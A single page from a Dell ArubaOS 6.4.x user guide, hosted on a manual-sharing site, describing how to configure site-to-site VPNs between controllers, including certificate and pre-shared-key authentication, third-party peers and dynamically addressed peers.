Manualshelf

User's Manual

ManualsBrandsDell ManualsComputer equipmentPowerConnect W-6000
351352353354355356357358359360
356 | Virtual Private Networks Dell Networking W-Series ArubaOS 6.4.x| User Guide
(for IKEv1). For more information about importing server and CA certificates into the controller, see
Management Access on page 778.
Certificate-based authentication is only supported for site-to-site VPN between two controllers with static IP
addresses. IKEv1 site-to-site tunnels can not be created between master and local controllers.
Working with Third-Party Devices
Dell controllers can use IKEv1 or IKEv2 to establish a site-to-site VPN between another Dell controller or
between that controller and third-party remote client devices. Devices running Microsof Windows 2008 can
use Suite-B cryptographic algorithms and IKEv1 to support authentication using RSA or ECDSA. strongSwan®
4.3 devices can use IKEv2 to support authentication using RSA or ECDSA certificates, Suite-B cryptographic
algorithms, and pre-shared keys. These two remote clients are tested to work with Dell controllers using Suite-B
cryptographic algorithm.
Working with Site-to-Site VPNs with Dynamic IP Addresses
ArubaOS supports site-to-site VPNs with two statically addressed controllers, or with one static and one
dynamically addressed controller. Two methods are supported to enable dynamically addressed peers:
l Pre-shared Key Authentication with IKE Aggressive Mode: The Dell controller with a dynamic IP address
must be configured to be the initiator of IKE Aggressive-mode for Site-Site VPN, while the controller with a
static IP address must be configured as the responder of IKE Aggressive mode. Note that when the
controller is operating in FIPS mode, IKE aggressive mode must be disabled.
l X.509 certificates: IPsec peers will identify each other using the subject name of X.509 certificates. IKE
operates in main mode when this option is selected. This method is preferred from a security perspective.
Understanding VPN Topologies
You must configure VPN settings on the controllers at both the local and remote sites. In the following figure, a
VPN tunnel connects Network A to Network B across the Internet.
Figure 36 Site-to-Site VPN Configuration Components
To configure the VPN tunnel on controller A, you need to configure the following:
l The source network (Network A)
l The destination network (Network B)
l The VLAN on which controller A’s interface to the Layer-3 network is located (Interface A in Figure 36)
l The peer gateway, which is the IP address of controller Bs interface to the Layer-3 network (Interface B in
Figure 36)
Configure VPN settings on the controllers at both the local and remote sites.